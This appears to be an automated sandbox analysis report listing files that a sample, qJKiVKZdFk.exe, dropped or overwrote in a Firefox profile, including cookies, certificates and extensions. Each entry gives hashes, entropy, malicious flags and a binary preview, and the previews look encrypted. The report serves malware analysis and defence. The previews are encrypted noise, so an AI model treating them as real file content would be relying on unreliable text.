                                                                                                                                      Preview:{"csv.(.X.............'.?...Y.<.a...Y...|.djH...X.e...n..!...}..J.b.$....I...C.K.....ME..{d....)I...~.i.ka...8..J.#Rb.@.......fk4x...G..ux........C.....M...gd...O}E...>...D...Y....i.....}.#.5-S...9.~..1.m.....x....>.......}..'e..t.2..........[.(...^*..t...n.E.y..A.\....?'........,.."&.Gj.6..4..V..<.#"w.sZ<.e4.c.?46.R.........X.4..:..P.[.V.[iWaG...I..C..cG.2....Ki..Z.ruw.8...&...?E...J>.1.e#-.|.@...........lm.$.9..}u...,..B..@.9..B.Y..%W*#.P...pLV...L...G..O;../.]!gT.........d.l.m1(...n.......8_?.d.`#%Cr..Wg3....2..P.......u.|.x.c.5..D.].......s-7....[I..}..2-$Vp.v......Tv. .....n..'..S.....@.#_HM.X...?_.u.@zN.0....qonIY.....h!.+4L.....N..@.z..N(.n.X....5...=z.~.K.....%.._7..W.......(...,.&.:y....S.5@->.l.F.....E^........2..b.qr......g5........H-~.o-..8....M...Q....?M.,..v......K....[.....&...B...t."I.Y.n.)`...H]_m..u.N.!#k..,..Y#.[?KT.J|L+..x....ajP@...3b..#....._..U=|=.F'bd....O.!@a..0)..\.xn....fc;....1..5.8.v........|..{4..V..G.

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):865
                                                                                                                                      Entropy (8bit):7.7396554294618465
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:AGDpaLQ11ef66+t1Pmjv6FnOj9Fm5u3ibD:j6k06v5mjonOZPAD
                                                                                                                                      MD5:62496D2756A327D3BC91A915B44CCAB5
                                                                                                                                      SHA1:301DFBBF4A8C6177D38B6400C3CD022E7BBFAE7E
                                                                                                                                      SHA-256:F3BE75AA4B6AA829604643FEEBB0D40FF33CD4563BB27B305659864E6E8BC643
                                                                                                                                      SHA-512:2342535E9963F22387F1105C0712A248CC86DB9A39361FDA88279DD088990281602010DE3AC3988BEA7F30A03893549F4F6A343FAB0F154F639E52AFC7F016C4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:aus5.t....!..f..o..~.g.E.h/.c.l)H..3a)x.."qk..:.>...aN.......W.{.1<'.<....\..5u/......O~d\..!..mr..u./z-..k.._.j[1*..HIR..D...).3 *E..Zep.&.D..{...`.a]c.... 5..7Q^....E.b..c4g.._..M....g....P1.c.....2........R.l..-.Fb.d.O...-..r..|...ixA[.."%.p.......swP4...e.....(.M@G_+.3[{......7.Y.0y.4...%.....R.`c.jp..0..2..j..C...OxA...8....!.M...}PV.Cv...(.iST3.I/.iul....!..t.;.)....u...WE....=....{N.Aeh....T....IQ..A......k...{>.#..oN...=rX...D....:...l.R......3j.......TM<...........0U..j...........g.`.lG..D8..b.D........L...F..6^.R..>CvF".M. uNF5v.~..\Q..d.eI.pE..G.....;9!......."...^....(.....W..Q.....N...*...VPO...O.^.\.....p.D..T.oF).@...:?.GT.W.W{.C...X....k.pc.!.RX..ZOG#.O.?...GM..tm.u.Z...O.......';..'.$.Sg..>.Y....+.e...}.:.@Da..u.^.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5756
                                                                                                                                      Entropy (8bit):7.969102297342676
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:faw5yjXkVojZjZKwHKil9ZECGOi042CtVHs4GjYYtli10p838ZFi7GKry3:fObk29ZKwN7ZEXOi7ZO4Gjxtlg88sZ9h
                                                                                                                                      MD5:0D5A0CDE7469641722F0FA7B81048952
                                                                                                                                      SHA1:1CF4F8C6655D888B5ACDEB2520D895ECAFBB86A4
                                                                                                                                      SHA-256:B3456A2888DBF5EFC6D7FB1BB9108F0BC6124A638FFC648BD3AC0B8F582FBC12
                                                                                                                                      SHA-512:E32778F2945E9468AF6ABD78C5D453ADC35454B7852039B83DB2DA78A7398FE8EA3919ED3BB13D6ABD9E988893FB0943BAFCA1971172F7B4760A7A36E20AC061
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:mozLz...6..%e#.j.1.0.2...O...M.s..../0...L...1.Q.~X.E ..w.[G..5.._..q..Xl\c...........M..'..k...kz...13......n0Z../..z...;5W2..@39.;C..v..>#..fog.:".q.T*.iQ..3_.5.Dv{)...B.. ..B.....O...I.D.".;.y^t...pR..N.K#...^...^........7....].9.MV.;...D....+."....!..Q&c.[..d&.*.t.m...U$.=..aa..A......[.2.R9.......@...i.......q.@L..a..N./.=$...lx4....w......~8...p.2..L ..>..-2<v'n......O$Cu......B....L.....#.....U.6A...Y..%0...4b......%..^x...-..>.y.n..\...?X......U.A...a;.Ek&...ybY..)...Jy.6W./.'...i...+.7Fm.X......Ec.....u.`.t.C ..W...[;*...d...J.....)...D..38...8"`:r.%D..e....Z...<o.............U'k;O.c.3.A.x:./r..1..."}...k.x./...M.u....B..s.......v'...p..).R<...).:ng...7@<}.Hy`3.}.).....:o...#z'...2..g.........4......E...+N....Q..e....b.h.`.UX.ee* ...o...8=.T...%o{L.x!q..p,k.R.q.....F......(..`.N .......`.G...w6..*..&/OE...Ty...t.d.q...wv+U.o..W...l...Q=09.!.l....5v.......$.]/.s...HZIl....C........(....g~2.<AM..[fWR...Wg.NK..y.L.:k...U..>(..._.f...Z

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.347057425466548
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YWGVvfqzcZ7t1Kh461sm2RPorzW4aVswyL/QOd0POG+QGP3ukIcii96Z:YWG4zsp8L1sfgWnyLorPOG+QGPukIciD
                                                                                                                                      MD5:7ED3439658BA93B9C8BC8F05F75928B7
                                                                                                                                      SHA1:80BC5E2F31AB84E8F26F96A8D7023343266B8AE1
                                                                                                                                      SHA-256:E02F80FF58D8742AAF030F1E992E73064AE1715FB8E018334C269B9DF88F7185
                                                                                                                                      SHA-512:E1BD14ED1D8C973F2EE0B1B169FDEA01AD96A4E7FAAFE4EA7B22F231ECE2D926DA4664031E5E11BE3E4C751CA5D2D12FCA8A9E92C66810A33BA7EF232DCCC4A9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"sch~s.j..H.kv....nM..]D......Y.(...m.@..]...*.~.Q.d.mF...........]...4.e.._ ....6.n.O.+..$...].......`R....bf.....X we.Np...,._d.k.N..1.C$....Pv9.....C..[........d?s/..C..l....{.b.FR.;.u..~.....x#-..k2y....3}v.#>..`.:........<..Z...1.....q.0.*...|u{.|.,.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):229710
                                                                                                                                      Entropy (8bit):6.277192370368357
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:deJdvSDeN5iHesJfJ5ez2VpQ8BnoLau8kO8K13MEHLriTkqyEXE5:ITvSY5ihJfGD8BVuTKBj6Tkqw5
                                                                                                                                      MD5:8D766668DC495F8300361DA3E5C072E2
                                                                                                                                      SHA1:F3C06C5F69681FD2CADE40419FF1D74245F65C62
                                                                                                                                      SHA-256:441EFE4D623F10BD7695E22BDFE1C6E95A082890AD90904EA435F6AC5CB79966
                                                                                                                                      SHA-512:ABEA684FA96E3567893265951A57E75A6E65B1665B9B61E2C0E3ECF8D28E4BACFDF366CB0BA11274DC6EF39F9E407B388D9FA1332C168783819B898094BCD849
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLit7..5A..).1.e$\@.\;.0Paf......?y$.ub7.w....._K..l...Q.~..0C.N..1-Eh...%K...$...$P..O..5...S.Mt...G>.....z..6.A.....$d~.{...G....4^6.7......F.m..q`m...OL...Q.B.C.....m...s......d.9$.. ....%Zw.c.h..9....)n......A9.m..).U..Y!...U~......._...(......f.U..k1.`.....U........,..Wm...bV.d.....6.A..[,..yK...........$.r.%#.'.2.kr|N...).(_.....%x....S...P.W|.H.ZF.M...;.}hL:Q..x...R.C.a\M.P.<swD.T.)h.$..-j.).A..R.G8...'..,.|n.5.;.$j..l.....C."....<.Y$^.B....V.].FP.y...4.....7....]%rd..Jr...S].t..I.......{...O. d.6..6.MZ*..h|r%n3."6.WJh.f..`....l..\m..."j....\Cmy.m....!....Y....?(m.,T.....Q,.u.e.."-.i@..VQ'o...!.:.....mb...7.../.T,...X..c.;.s\..W....r[t9.O.`N.......5.......a.7.F.D.J.nl..z2.........1.8.r.FSu..X..l*.....2..\W^D.v2.~.Y!a.S..._...I.[.=..|....1.<..Q.?I.......f......w.3...r.oE.'5.].$. }..7.M...).R.z]...X.:.G..SQQN8......p.E....Zj.p9..:.C..*.j.hp.....WC......e.(=..........a.{(V\....y...3...w..z}..(C.F.....w.^..8......(..Qr..Z

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1209
                                                                                                                                      Entropy (8bit):7.838907523536282
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YWoNwgJxi7jaJLl5GNhJCVBt/7Vb+s/igKPn+f708P892bD:YWoyxwLlUJgf7x+dgKGf7pPjD
                                                                                                                                      MD5:B6CDE6E5DBE640FE27BBCA2FFE0445A7
                                                                                                                                      SHA1:D4547EDA928463AD4995A9CF4C8DD4E4B2076D7D
                                                                                                                                      SHA-256:50C0E8B071F812E2C7EDF9274459CE11FF513AFE41D1F0A5D669C67111C0B72B
                                                                                                                                      SHA-512:5D71AA2AE2505DD92594E6BA583B64DF4E0F44E7D7C19CB25826F19D2E323DF010AFF574991823653FDFC7D2C102341EEE9C8BEDD4E12F71FFB35CF34B38AC20
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"ver...f..3.....A.....#...../.I|..O.6 .OZ..?........Nt...!.Q..ml.F......q..7s$.j-....<...v..\...VK.....,.z[..,[.D....`.&...%.........*..]2....[.....T.*t..B...{.._.4..q$...|.5j..X..>........1P2...2..@}..T....#...bJ..S.2,J..d7....v. ...8.`w.2.....4?.(......../......1fF..c...Q......x..n....c...6.K.Yd...w....P.I......^.7.q....B........9....M..o.:..Kz...=%A$T..w:...........z]@d..'...`.h2.<.E7.......3.....{."...}...9....O..rq.Z...........G...*.x.E......w^;B.......0.o..h~....q?...Pt..>..4Y$.{-..u.t18C..7u.S.T+._1.h......o]..N|.w+e._0.... {..g...i9b.TW...:..?...H..S..."........z&.....uk.1.....sF....z<.......0.....S..L...X.p..i.C...:V..kX.....4...L...k..._...d.&\..O._."?..Lc.. .......-.A...\..3"mF....(f.M.;.f....|.;y..-U...|.btU.7.D.O....m.....D....|{...3.Hrv..Lt.f..E..T"4.Y.WK.(..V\....q.^.^`...?Ie..:%..%...[.A0....g"RY<..4.>JWs....l...............v...zdo}.l...qQ.jS@r.>...a7UoA1.>.+Y...-V.....B....#.....P.+.F...B|...d....@.../...#.....D[..1...@8&.4.

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):262478
                                                                                                                                      Entropy (8bit):5.648403558218941
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:WVegUzygiGNg3e6KZNFIfisHFxEPK1TvofBcbWZkecv3MHs:WVGyyEe6KZLKHFxEPKyfKd3R
                                                                                                                                      MD5:8DED5A99C543CE5AA7BD7CB63B84DE05
                                                                                                                                      SHA1:324482037DB58C3E1E2BA5AADEBA39A655BC356B
                                                                                                                                      SHA-256:FC166DE70845C31FB304FA61C095C1F3C1D7B47C4EC6316AA27A2D05904BE93B
                                                                                                                                      SHA-512:7208C5EA40A9ABE81CA1763F208A09BF62D64BA6EEB85512AE6E8077EF8BD238EF4A7AB900C252E27836EFE0F23FDDB0BCD4F82F76ABCD9F9D5E47130821F5B9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLit...r.\../.>.o].f0m(wo.d..,..>..4.a.H.2...T..2.7.y..v..Fk..g%.y_~..'o.=..9M$Y^.].........*P...._.#.$...42.....P.3..d...#?+{...-..h.@...6...1.S....p3./....M!....q.%B_eb.....s-..g....5....-R.?.f.bJ..JX....g_%....BW..([..&....iH9.uk.T.,.H..,...(v...]........Fud..N&r.9[...b).Vqd.<..;..c...d^P.1.$.v.HVp.d5..5...S[&..(.x.-.y....W1..)..@.[.|Q..j8.w+. ]..2.`...W.\2........6.9.`.)Nu...p*WU4....\\[..V`E...:..hX...4.pp.g....U9.n.JS...'P....R]...;/..){...:...,.HF=.8Gs/.%...[...D..._..X.x...Z...].....-.H....^.>,x..4NV..Nj..a..2.m.D{...AD.[..........P..&s?t.h......F...e.B.k..g.....N..y..xj...a.3.Y..ru..G.}...'m.:P....b...K...)..dixv.*YH.f.=..m..,S.a.-Yt..[&....3(z..c#4VdA..QX..q.........*"....,4.........6.Y7@myk.7.&..6^HB.L.g...t.....s.^.!/A ja.g.Pr.0.K.C.+.U..tG.<p...H......p>...o.K.....N-,...6.(Am2.Q..8^.}i......#....w..px.9...`.<.....w......J.E1.].AN..,.`O..G...;.j.G7K...I.O..2.....\D5.....4.>......tL.w...!. ~..+ .E...X....e."...l........3Yz...'}^<#.m

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):98638
                                                                                                                                      Entropy (8bit):7.997935312463658
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:F2MBgAF2Qjx8nGkZuga0cvExjMC12vSyEI4/:FvfF2QiG+aNvyMn6yEIg
                                                                                                                                      MD5:5F72B9D1824AEB1DFFD4C39B172356D3
                                                                                                                                      SHA1:E00313CC7FF2DC03430972A3F4E45686EC04AE73
                                                                                                                                      SHA-256:7835E2C911CD19FA51C6FACB357FEB6287B57FEA3B91E815008D38347B6879B3
                                                                                                                                      SHA-512:01C5D9595C53FB9C7022E1EC1FA1E25CE338A2ED155DD6CD6073F65E682745F8C16657C265968F1AFD2B80A701469626C42E44664637D307528E337B4241BC1F
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit...(.BDH.......Ls....k..\..........A...O...V...:1Y.#hh...H.l.....`Wd.c..."#q....U..P.nz..*ID.C..I..oP..v....,.`.x...0.^....^..$.....m>F.I.8.kOQ..3<|;..up.$.q ...=.....J..L.?G>.QZ..J....r.<.S.d..h...t..N.....c..;-..!.B..h;t......'.nJ.1..rB.{........F}..CnM...>X^X.yE6...j.....Z..kb....U.\..mmg..M..5...Z.f.8_hn._...g.P..rSF*;..#.9G....Sd]W....]..o....V..X......_.o..E`.I{.d.jV.jg.w.2{. xl`.g0@r..>.[....Gl........f.P...:.F1....>.......4.jX...e.w...&.IE.PLl/........6(.)/_.{r....y..zY...........YTm.Nf..".....I|.d..H.-....^.=..W.1o....M..... ...=...0.Mf..|3.!D5.m!..h.f....O..N..J..a..&...T......0 .(..o..>.K?..m.f5.X...(.BA...Xg.+Jt..{f..[.t.F....f5R.....!....n4|.U..<J..K...p0.O........Scf.....nyT\.c.].".~=. ..AJ......$..+.L.g2..,. .2E^.....L(..>/....[.w.B.Q...."K.uO.3....N.Im...y............s.^..PQ33.?.....B..C3.2.{.[...3....B.uC..b....G........Q.......GJF.-.!#.....G...2../.q ..h.=....T:.*....B....s}r.........7.7z..........F....f.

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.993931270749466
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:aFY+wae6e9BKKoZDNMKRN9xU+7w6o7e+DXfT:aFYWS90DNMeVwzeWfT
                                                                                                                                      MD5:0D096224FFCF98DB1D918E7164BF993E
                                                                                                                                      SHA1:75534E9B49F683CA1619A81696F00AA3DD154E75
                                                                                                                                      SHA-256:DB81C54A4A4A88B7CB4480B3FD9170F9B77792F332204EBB318F93DA3E8985F2
                                                                                                                                      SHA-512:BEA7FEAE11F338DBF6B0A781318A07B9AFD89082D6AA2B18509832B16B73797D7CB847EEEB5FACD45EB87675AF340C925C3CF1124ACA709EE75E8F52592CBC93
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..-...4..nNnw.B...J(....2]...i~.A...D.....g.l.50s..,m ...$&...b.f..p..s=...7.*...E.........bON...n.x....@...Y].KO..m[.%......,.`.Wg+....H=.8.'..!5.....&.I..0i.@.....W..e5.y.2.f.gv.\`?....]..m..=..`.......C.....Q_<5JK...>...2.JXjY....R..QvJU...M`\...(vUT.............z.j.m..w.S.aV...%We.wdm..&RlbLO..,....e.#m9{.f..m.4..[d...s'...7......v.l.L.5.hq..6..L.g..s..o.ar.O..c..\...]2..a.g~...-..3.9..%._#......=F.. .....r\I2A..o.NV./j.6.O...O..n.ClY. ....Q....I.....5H..|..f.{/J...C..|;..f...3&.d..........r..+..Q..nz..V....2....fV...Po.....@.+E,...-o..`......lXo..\..Y.4....q.n.y....{6p.1^..6j.Z..W.F.|......u.....{....U.n..7=.@T.P.`=.......&^|+.Tg..........%..M./._.;.k...[.....l....t.f.N.YL..3d...X.....0.<.O....O.tI..Y..8.......k....(...D.i.{.....61.....BzT..8...ai#T.?.v.y2.2..~.N.Et3...90.....s..r...Lw.@...22.x....n..t.z.MN@.mZ.Pd.2.j}d.V..&_......!jz.b.;C\n0...e.G:.W.^56..]....?..G.=.#...!...\+.[h.g~1 .9w.w.*g@....*..P.!{..7.....H?.....n%...`...C....

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1423
                                                                                                                                      Entropy (8bit):7.858901580292379
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YTslmw3w/P21xYM8e1Z03yFi6UX7kKllUCTcuJqMmsWIGInc0vzWbCOf9uP5bD:YglBjIM8e1Z0qiHkAlUrho1va2BBD
                                                                                                                                      MD5:50677A97340E081ACDDE285A0A52086C
                                                                                                                                      SHA1:A6E06F9C83546C3D6D013E046D2D8ED3AD9FE173
                                                                                                                                      SHA-256:E4504CF8756D588AA4660A88A59436243750EB5FAC5E1DE9F7E8A04232257524
                                                                                                                                      SHA-512:5387912F4402BA3E851528C7759CD711E1934BEC58AD30B5658D130533843DF088D9279D621B1B4994C4B650536EBCB95AAC80E1F12BC425ED8AC44D65E4E888
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"for.x...7.....[.(T.......$.MD.!r0.t..<......f......v....o...e.}.....V".....q..N...z.+?.K..X]A..u]8..h`..........e.n.6.A.i.n.s.m.f.7.O..G<.....)....PC......{..y..Z.6...h.&`pv@..l[.|......$G......~.........fB1.s.......{..1K..[..Nmv.w..W.ckP.....YN|W.{C.../.T`u..m......R....Nv?.....B>t......F..o......<....9+C.g.a!.).H..5d>.._.N.y.]..U...p..G...6q+.?.&5_:T....I&qw.......-...v....)....Gw.>..{..?.&...m....B4._....3S.K..<&..A....0:..lv)...6*jO...5X...{K...q8=.......'.w....O4.`..I..$Et.7.y:.<.(fyRH.....bG.!Q..S/H%..w....{..#.al.g.5N..b9..&..C.[Ay..(Xt......v.....X..K....{Ou.h.o..$..[..xa.\!*... ...!f...K....M..m ....]0..i.us.......'.o..#i....j..._....:z.).P...Q...\.w......Tn.].Ud..:fH...-.c.m..!......F...(....HV..u4..9..nc.....?..O.9^.?..U..08.....d..*.....|R....v.(..w.......=..y....hJIsyV...%............)......+.Q.s..T.C....A....n........._K.p.j..bD=T+)....&...#.VJ.2.Az....ZD..i..(..y%....q..<...f.R.Z... k5.%N.P..l.uT....g.....BA....f...&..|.

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extensions.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):37164
                                                                                                                                      Entropy (8bit):7.994841730369583
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:gmp2rj7EDIsuc01oSu9hpEGrfrmq5Wd35akYaxqQP:jukDWxupnrfrmGq35lj4u
                                                                                                                                      MD5:34F10E49CC07F5B21AF31B8E5D7CAFDA
                                                                                                                                      SHA1:71EE1D54BED690CDDB2F848D83ACCB4B9BEC9480
                                                                                                                                      SHA-256:46C4ECA8AF159BEF18A8718557B9C977E47CDC39F7C814C5C46A8EBA01830B06
                                                                                                                                      SHA-512:CF3FD50C9B17BB332F833EB7E60205CEF7F533080ABAE3FBA9B6964322700864BA4143901CD76EAEA20C15B30FD93226C281E0B754A70ECE54FFFFB63A4EFDB5
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:{"sch.7..X.h...|."!E<........+........:...S#.....~U..4..-..2.......N]....2x.6.;.....b'.m.C-r.Q...0.)..6.....Oi[[.9....=2.<...O....qq&/....._h=.P.....j..U@\e..Z.1....k/.|(..^.....].3t<..x...#..wnq .S.!.......n...;..T.....]. .D..)e.~......[...|_..*..8.v.*.4?/..V..iq.8BL..o...n... ..X.'...Qa.(/=...L.S.~'.c~.Q.,..P...K..g.k..H.!...... .<.Y9!..'...x.&..t{..r...'... ...o..u..P1t..=9.V.qC.....}.[#..{..%...K].b7].f .<R.+?*[.v..Y ....s.o....../..<......wqc.Mn.R....ap.?..:s.SY/:._B2..w...Q.2..3}..~T..e.r*..9.......m.cU.z$......Vh.t.C$#.W....$A#...g..P~]...KQ..]......`..GHE......%.V.Nw.....".......+O. .7<.....7L(V...ad.....s]..2....3 .a...l.c...\^ZWGi@@,;..K..$7...yg..U.W.Uq.....Z.....HjR.......;.&....]...."&U....G/(......'."..}....U.h...Y.U-...Yj.4 ..L....M........j.J......A...5Q...EHQ....s..x9.rP2.W+.qj> .g.L[w.....4....|ewz0.....n.<5..q.2......R.5.I.wN.` .Tv.~a&.^J..g.3.3..[.X....t+S..^...2K..F.[:......k...p.=.H.c.$.a.2..g..p.`F..V..".....1F6~25

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5243214
                                                                                                                                      Entropy (8bit):0.4265593294105258
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:gi+G7N1khhXlKsJ5RVcRfhp+fdOlk34+1E+OxaaJNOVaR+Ugzm:eNhlJ5DgwOY2x/JNO8gk
                                                                                                                                      MD5:4A18E279A1EA048945DE0BCE167ECECD
                                                                                                                                      SHA1:C08F6013FF12BEBA29D6F724A9F8C8E329E0F7AA
                                                                                                                                      SHA-256:F4575AA3C4F32660791C01FC2293602A5E81E2A10F1E4C85571BD5AECC5D4779
                                                                                                                                      SHA-512:9AA0D0AB5533062D85A3F65405D1099ED5AD065D4A9F8DE8AD42FE556C102D6B812B03CE4C84CB611CF78610BAD803700C3B79D88B6034A6C20865AD6A5F62BA
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit...<....U.%..>.Oi...2S..w.vl..m.kH;y..E.V.HI7.8.....9 ...I.._.;<9.........6..l6Xp+:5.c'..|d.M.....%.?ZXG.TU.c..EL.Zy.v.@.!.;.1....!4.....!..TJ....5NQ.....MZ&..R...h...a.7>...S./.....L]..@.W.^.=....w....!..ZIq..z...W...l......y%'.mK.S..4.g.^p.._.....{.a.....E........h..OB"W.-[]...-.QAr..(..sPY....#C...".O.p....f`yY.2...9w7..|...e=..............D..A...?8=R.?...W:..&bP.....R. .G3.....r....+}..B~.t.E......8.x._M*.......J..3.........Q.w...........G..oR.6".4P..e...]...T....A.I.sv.:.\.c...E...}p..7N....ds..]..e...H..-=...........w..?e.)..#G...$A.A...,D...qK.........G....E..6..v.xG.o...(|r3..d0.@&. ../.T...dK.Su....S/.`."_.;.Jh.4....<JH.R..B.....<.yH.7...C..#..f....].$.,..rq.&.,%y.[X.,............v.1fEt.?....h..d..F.`...~...tR..D.hV.....U0..K....`..=...PI....t? ....R.5F......n..&206.N..'..py/7......~.E3|.9..%8...........*;p...o. .zX.e.R.uz..Iw..)..#^.I/....M...Ef.?.F....p..@...^.....b....y....T..f..F...E..- .....6_.E+.[.n{..G..X.T6>C.zGe.=..

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.993192029221556
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:99ki8XpCruk5qS6bOUYLOqqLaz6WgO1QSyyKQ38Y7nafI5NsvabfCJd:9/80ruk5qSuULOqTOFOSYD8IXiaad
                                                                                                                                      MD5:2F076FF55242471885AF69C30BCD3A23
                                                                                                                                      SHA1:05A4559F1E039A43C6712A56F58A9AA4585115EE
                                                                                                                                      SHA-256:C15FA10D5ADB7EDD834F41DC92589AA8299C2DBA9F138A8A8B8E34F738A9E427
                                                                                                                                      SHA-512:A4F13768339EE78A7A19A6BEEF131339911DEC3EB82E6503564D989DEBEF78DCBBF8821BA224551B54CE2227B3662B74753809EADE89237230CC65004D6E97A5
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..-..?.....{............._.\.H..T..@...z..g...B.......G......$.....c).p5.0P..3.e"<.$....1..z...4!......df.&q...n$n.7p.D=&...!......D..[....4.s+.>...H..6..L.|......|...n.M...3...?M..C.7..d.!.-P.Z.Y..........aj..T..........q.;/.......q@......TI..hVc.'.$J...S...)...-..}......._}.c.......<<...*.R..i/..:.0.#`o.Pc..a..:...k....I.......K.|..!.+J1.......W............U.1..kW8.W.{.<.Fk.....*x.D...f.M. .=......J.wG.8v#...Q\.IU6.......[../3F.3..t;3....c. ....1.tJ;m............3~.=.."..Y.T.2Kzc...k....u.L...JR.D7*G.)..n_O..E.-..f..n.2.i.......h.M.i.hW%..[.p(.8..|.x..k..*...4.....y..w.Vb.R..er..uX.g..21.A=n.s%.......w..X.V.L.....b...$.)...h(2.*.A...LT....g;..f@3....&vd.e...70..)...z.Q-...{B.|.........Z~=.o"....,.N.Y.J.7.......b.2....X.o...Mf..g5~...uH..>..\?O63.....dla1.v\l.....Hz'(..*..x.>..T>A.}..A.2.l.1....]e.M.G....-6?x........s0P..A...;....uC.Q}..O.'/..,.y..jN....E.s..z@..&...N.7PV.+J%.6Q.......`.j...{.b.BP~i"E...T_-.6..x.....L.91.Lj~k.K.w..4..

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):714
                                                                                                                                      Entropy (8bit):7.619287986333302
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YeaOytk/68IT1RwO7IRKzKBKHogsMzw+CHNXVrxY4u3X+xkiYGPukIcii9a:YeFyO/TIT1KOaBgsjHNXVrxY3XGrYGUX
                                                                                                                                      MD5:D433BB42CA76D5111805FCF8D0100B5A
                                                                                                                                      SHA1:6702C18C0B0343F86D5749EEC8BCA4EB8484A633
                                                                                                                                      SHA-256:A448857DCBF622CBB14C39973B070FF0A89C094F249DD50DEAC74A3C5B5F691B
